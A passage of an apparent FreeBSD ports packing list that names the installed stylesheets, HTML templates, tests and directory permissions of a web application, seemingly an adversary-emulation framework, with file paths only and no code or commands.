+%%WWWDIR%%/static/scss/bulma/sass/components/card.sass +%%WWWDIR%%/static/scss/bulma/sass/components/dropdown.sass +%%WWWDIR%%/static/scss/bulma/sass/components/level.sass +%%WWWDIR%%/static/scss/bulma/sass/components/media.sass +%%WWWDIR%%/static/scss/bulma/sass/components/menu.sass +%%WWWDIR%%/static/scss/bulma/sass/components/message.sass +%%WWWDIR%%/static/scss/bulma/sass/components/modal.sass +%%WWWDIR%%/static/scss/bulma/sass/components/navbar.sass +%%WWWDIR%%/static/scss/bulma/sass/components/pagination.sass +%%WWWDIR%%/static/scss/bulma/sass/components/panel.sass +%%WWWDIR%%/static/scss/bulma/sass/components/tabs.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/box.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/button.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/container.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/content.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/form.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/icon.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/image.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/notification.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/other.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/progress.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/table.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/tag.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/title.sass +%%WWWDIR%%/static/scss/bulma/sass/form/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/form/checkbox-radio.sass +%%WWWDIR%%/static/scss/bulma/sass/form/file.sass +%%WWWDIR%%/static/scss/bulma/sass/form/input-textarea.sass +%%WWWDIR%%/static/scss/bulma/sass/form/select.sass +%%WWWDIR%%/static/scss/bulma/sass/form/shared.sass +%%WWWDIR%%/static/scss/bulma/sass/form/tools.sass +%%WWWDIR%%/static/scss/bulma/sass/grid/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/grid/columns.sass +%%WWWDIR%%/static/scss/bulma/sass/grid/tiles.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/color.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/flexbox.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/float.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/other.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/overflow.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/position.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/spacing.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/typography.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/visibility.sass +%%WWWDIR%%/static/scss/bulma/sass/layout/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/layout/footer.sass +%%WWWDIR%%/static/scss/bulma/sass/layout/hero.sass +%%WWWDIR%%/static/scss/bulma/sass/layout/section.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/animations.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/controls.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/derived-variables.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/extends.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/functions.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/initial-variables.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/mixins.sass +%%WWWDIR%%/static/scss/custom-bulma.sass +%%WWWDIR%%/templates/abilities.html +%%WWWDIR%%/templates/adversaries.html +%%WWWDIR%%/templates/agents.html +%%WWWDIR%%/templates/configurations.html +%%WWWDIR%%/templates/contacts.html +%%WWWDIR%%/templates/core.html +%%WWWDIR%%/templates/core_blue.html +%%WWWDIR%%/templates/core_red.html +%%WWWDIR%%/templates/exfilled_files.html +%%WWWDIR%%/templates/login.html +%%WWWDIR%%/templates/obfuscators.html +%%WWWDIR%%/templates/objectives.html +%%WWWDIR%%/templates/operations.html +%%WWWDIR%%/templates/planners.html +%%WWWDIR%%/templates/sources.html +%%WWWDIR%%/templates/weather.html +%%WWWDIR%%/tests/__init__.py +%%WWWDIR%%/tests/api/__init__.py +%%WWWDIR%%/tests/api/v2/__init__.py +%%WWWDIR%%/tests/api/v2/handlers/test_abilities_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_adversaries_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_agents_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_contacts_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_health_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_obfuscators_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_objectives_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_operations_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_planners_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_plugins_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_schedules_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_sources_api.py +%%WWWDIR%%/tests/api/v2/managers/test_base_api_manager.py +%%WWWDIR%%/tests/api/v2/managers/test_config_api_manager.py +%%WWWDIR%%/tests/api/v2/test_knowledge.py +%%WWWDIR%%/tests/api/v2/test_responses.py +%%WWWDIR%%/tests/api/v2/test_security.py +%%WWWDIR%%/tests/api/v2/test_validation.py +%%WWWDIR%%/tests/conftest.py +%%WWWDIR%%/tests/contacts/test_contact_dns.py +%%WWWDIR%%/tests/contacts/test_contact_ftp.py +%%WWWDIR%%/tests/contacts/test_contact_gist.py +%%WWWDIR%%/tests/contacts/test_contact_tcp.py +%%WWWDIR%%/tests/contacts/test_ssh_tunneling.py +%%WWWDIR%%/tests/objects/__init__.py +%%WWWDIR%%/tests/objects/test_ability.py +%%WWWDIR%%/tests/objects/test_adversary.py +%%WWWDIR%%/tests/objects/test_agent.py +%%WWWDIR%%/tests/objects/test_data_encoder.py +%%WWWDIR%%/tests/objects/test_fact.py +%%WWWDIR%%/tests/objects/test_link.py +%%WWWDIR%%/tests/objects/test_objective.py +%%WWWDIR%%/tests/objects/test_operation.py +%%WWWDIR%%/tests/parsers/__init__.py +%%WWWDIR%%/tests/parsers/test_parsers.py +%%WWWDIR%%/tests/services/__init__.py +%%WWWDIR%%/tests/services/test_app_svc.py +%%WWWDIR%%/tests/services/test_contact_svc.py +%%WWWDIR%%/tests/services/test_data_svc.py +%%WWWDIR%%/tests/services/test_file_svc.py +%%WWWDIR%%/tests/services/test_knowledge_svc.py +%%WWWDIR%%/tests/services/test_learning_svc.py +%%WWWDIR%%/tests/services/test_planning_svc.py +%%WWWDIR%%/tests/services/test_rest_svc.py +%%WWWDIR%%/tests/utility/test_base_object.py +%%WWWDIR%%/tests/utility/test_base_world.py +%%WWWDIR%%/tests/utility/test_ip_rule.py +%%WWWDIR%%/tests/web_server/test_core_endpoints.py +%%WWWDIR%%/tox.ini +@mode 750 +@owner www +@group www +@dir %%WWWDIR%% +@dir %%WWWDIR%%/plugins +@dir %%WWWDIR%%/plugins/atomic/data +@dir %%WWWDIR%%/plugins/atomic +@dir %%WWWDIR%%/plugins/fieldmanual/sphinx-docs/plugins +@dir %%WWWDIR%%/plugins/fieldmanual/sphinx-docs +@dir %%WWWDIR%%/plugins/fieldmanual +@mode +@owner +@group |